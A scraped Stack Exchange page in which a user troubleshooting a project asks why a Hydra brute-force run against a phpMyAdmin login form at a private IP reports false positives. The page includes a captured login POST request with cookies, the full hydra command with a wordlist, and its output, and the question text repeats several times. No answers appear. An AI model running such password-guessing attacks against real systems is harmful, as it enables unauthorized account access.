problems with hydra parameters The 2019 Stack Overflow Developer Survey Results Are In Announcing the arrival of Valued Associate #679: Cesar Manara Planned maintenance scheduled April 17/18, 2019 at 00:00UTC (8:00pm US/Eastern) 2019 Community Moderator Election ResultsWhy isn't hydra being disconnected?math.h was not found at compile time: Hydra (Cygwin)
How did passengers keep warm on sail ships?
how can a perfect fourth interval be considered either consonant or dissonant?
What aspect of planet Earth must be changed to prevent the industrial revolution?
What are these Gizmos at Izaña Atmospheric Research Center in Spain?
Format single node in tikzcd
Can the prologue be the backstory of your main character?
Mortgage adviser recommends a longer term than necessary combined with overpayments
He got a vote 80% that of Emmanuel Macron’s
How to stretch delimiters to envolve matrices inside of a kbordermatrix?
Is above average number of years spent on PhD considered a red flag in future academia or industry positions?
How to test the equality of two Pearson correlation coefficients computed from the same sample?
What was the last x86 CPU that did not have the x87 floating-point unit built in?
How are presidential pardons supposed to be used?
How long does the line of fire that you can create as an action using the Investiture of Flame spell last?
Am I ethically obligated to go into work on an off day if the reason is sudden?
University's motivation for having tenure-track positions
Is this wall load bearing? Blueprints and photos attached
Keeping a retro style to sci-fi spaceships?
Python - Fishing Simulator
Derivation tree not rendering
Is every episode of "Where are my Pants?" identical?
Working through the single responsibility principle (SRP) in Python when calls are expensive
Did the new image of black hole confirm the general theory of relativity?
Did the UK government pay "millions and millions of dollars" to try to snag Julian Assange?
problems with hydra parameters
The 2019 Stack Overflow Developer Survey Results Are In
Announcing the arrival of Valued Associate #679: Cesar Manara
Planned maintenance scheduled April 17/18, 2019 at 00:00UTC (8:00pm US/Eastern)
2019 Community Moderator Election ResultsWhy isn't hydra being disconnected?math.h was not found at compile time: Hydra (Cygwin)
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;
-2
Ive been trying to bruteforce a website for a project but hydra keeps returning false positives and I believe it's down to an incorrect syntax with regards to the error parameter.
This was the return from Burp when trying to log in with random creds:
POST /index.php HTTP/1.1
Host: 192.168.150.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.14/index.php?lang=en-utf-8&token=8f28a0910b1e211eaa2fbafc14c1760e
Cookie: pmaCookieVer=4; pma_mcrypt_iv=0skiR3W7PmY%3D; pmaUser-1=TP79wnqCX1I%3D; pma_lang=en-utf-8; pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=aY3h4QQ%2CRn8veTiQNUjNjPf9HC9; pma_fontsize=82%25
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
pma_username=12345&pma_password=12345&server=1&lang=en-utf-8&convcharset=iso-8859-1
The error message on the website is:
Error
#1045 - Access denied for user '12345'@'localhost' (using password: YES)
Here's my syntax that I tried:
hydra -l admin -P /usr/share/wordlists/passwords/pass.txt 192.168.150.14 http-get-form "/index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error" -V
And its output:
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-12 12:55:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-get-form://192.168.150.14:80//index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password123" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "12345678" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "123password" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-get-form] host: 192.168.150.14 login: admin password: 123password
[80][http-get-form] host: 192.168.150.14 login: admin password: password123
[80][http-get-form] host: 192.168.150.14 login: admin password: 12345678
[80][http-get-form] host: 192.168.150.14 login: admin password: password
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-12 12:55:59
Can anyone tell me the error of my ways?
hydra
edited yesterday
Fabby
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
add a comment |
-2
Ive been trying to bruteforce a website for a project but hydra keeps returning false positives and I believe it's down to an incorrect syntax with regards to the error parameter.
This was the return from Burp when trying to log in with random creds:
POST /index.php HTTP/1.1
Host: 192.168.150.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.14/index.php?lang=en-utf-8&token=8f28a0910b1e211eaa2fbafc14c1760e
Cookie: pmaCookieVer=4; pma_mcrypt_iv=0skiR3W7PmY%3D; pmaUser-1=TP79wnqCX1I%3D; pma_lang=en-utf-8; pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=aY3h4QQ%2CRn8veTiQNUjNjPf9HC9; pma_fontsize=82%25
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
pma_username=12345&pma_password=12345&server=1&lang=en-utf-8&convcharset=iso-8859-1
The error message on the website is:
Error
#1045 - Access denied for user '12345'@'localhost' (using password: YES)
Here's my syntax that I tried:
hydra -l admin -P /usr/share/wordlists/passwords/pass.txt 192.168.150.14 http-get-form "/index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error" -V
And its output:
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-12 12:55:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-get-form://192.168.150.14:80//index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password123" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "12345678" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "123password" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-get-form] host: 192.168.150.14 login: admin password: 123password
[80][http-get-form] host: 192.168.150.14 login: admin password: password123
[80][http-get-form] host: 192.168.150.14 login: admin password: 12345678
[80][http-get-form] host: 192.168.150.14 login: admin password: password
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-12 12:55:59
Can anyone tell me the error of my ways?
hydra
edited yesterday
Fabby
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
add a comment |
-2
-2
-2
Ive been trying to bruteforce a website for a project but hydra keeps returning false positives and I believe it's down to an incorrect syntax with regards to the error parameter.
This was the return from Burp when trying to log in with random creds:
POST /index.php HTTP/1.1
Host: 192.168.150.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.14/index.php?lang=en-utf-8&token=8f28a0910b1e211eaa2fbafc14c1760e
Cookie: pmaCookieVer=4; pma_mcrypt_iv=0skiR3W7PmY%3D; pmaUser-1=TP79wnqCX1I%3D; pma_lang=en-utf-8; pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=aY3h4QQ%2CRn8veTiQNUjNjPf9HC9; pma_fontsize=82%25
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
pma_username=12345&pma_password=12345&server=1&lang=en-utf-8&convcharset=iso-8859-1
The error message on the website is:
Error
#1045 - Access denied for user '12345'@'localhost' (using password: YES)
Here's my syntax that I tried:
hydra -l admin -P /usr/share/wordlists/passwords/pass.txt 192.168.150.14 http-get-form "/index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error" -V
And its output:
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-12 12:55:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-get-form://192.168.150.14:80//index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password123" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "12345678" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "123password" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-get-form] host: 192.168.150.14 login: admin password: 123password
[80][http-get-form] host: 192.168.150.14 login: admin password: password123
[80][http-get-form] host: 192.168.150.14 login: admin password: 12345678
[80][http-get-form] host: 192.168.150.14 login: admin password: password
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-12 12:55:59
Can anyone tell me the error of my ways?
hydra
edited yesterday
Fabby
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
Ive been trying to bruteforce a website for a project but hydra keeps returning false positives and I believe it's down to an incorrect syntax with regards to the error parameter.
This was the return from Burp when trying to log in with random creds:
POST /index.php HTTP/1.1
Host: 192.168.150.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.14/index.php?lang=en-utf-8&token=8f28a0910b1e211eaa2fbafc14c1760e
Cookie: pmaCookieVer=4; pma_mcrypt_iv=0skiR3W7PmY%3D; pmaUser-1=TP79wnqCX1I%3D; pma_lang=en-utf-8; pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=aY3h4QQ%2CRn8veTiQNUjNjPf9HC9; pma_fontsize=82%25
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
pma_username=12345&pma_password=12345&server=1&lang=en-utf-8&convcharset=iso-8859-1
The error message on the website is:
Error
#1045 - Access denied for user '12345'@'localhost' (using password: YES)
Here's my syntax that I tried:
hydra -l admin -P /usr/share/wordlists/passwords/pass.txt 192.168.150.14 http-get-form "/index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error" -V
And its output:
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-12 12:55:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-get-form://192.168.150.14:80//index.php=pma_username:^USER^&pma_password=^PASS^&server=1&lang=en-utf-8&convcharset=iso-8859-1:F=error
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password123" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "12345678" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "123password" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.150.14 - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-get-form] host: 192.168.150.14 login: admin password: 123password
[80][http-get-form] host: 192.168.150.14 login: admin password: password123
[80][http-get-form] host: 192.168.150.14 login: admin password: 12345678
[80][http-get-form] host: 192.168.150.14 login: admin password: password
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-12 12:55:59
Can anyone tell me the error of my ways?
hydra
hydra
edited yesterday
Fabby
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
edited yesterday
Fabby
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
edited yesterday
Fabby
4,04311430
edited yesterday
Fabby
4,04311430
edited yesterday
Fabby
4,04311430
4,04311430
asked yesterday
FlashFlash
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked yesterday
FlashFlash
11
asked yesterday
FlashFlash
11
11
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
New contributor
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
Flash is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
add a comment |
add a comment |
0
active
oldest
votes
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Flash is a new contributor. Be nice, and check out our Code of Conduct.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f512176%2fproblems-with-hydra-parameters%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
0
active
oldest
votes
0
active
oldest
votes
active
oldest
votes
active
oldest
votes
Flash is a new contributor. Be nice, and check out our Code of Conduct.
draft saved
draft discarded
Flash is a new contributor. Be nice, and check out our Code of Conduct.
Flash is a new contributor. Be nice, and check out our Code of Conduct.
Flash is a new contributor. Be nice, and check out our Code of Conduct.
Thanks for contributing an answer to Unix & Linux Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f512176%2fproblems-with-hydra-parameters%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
-hydra
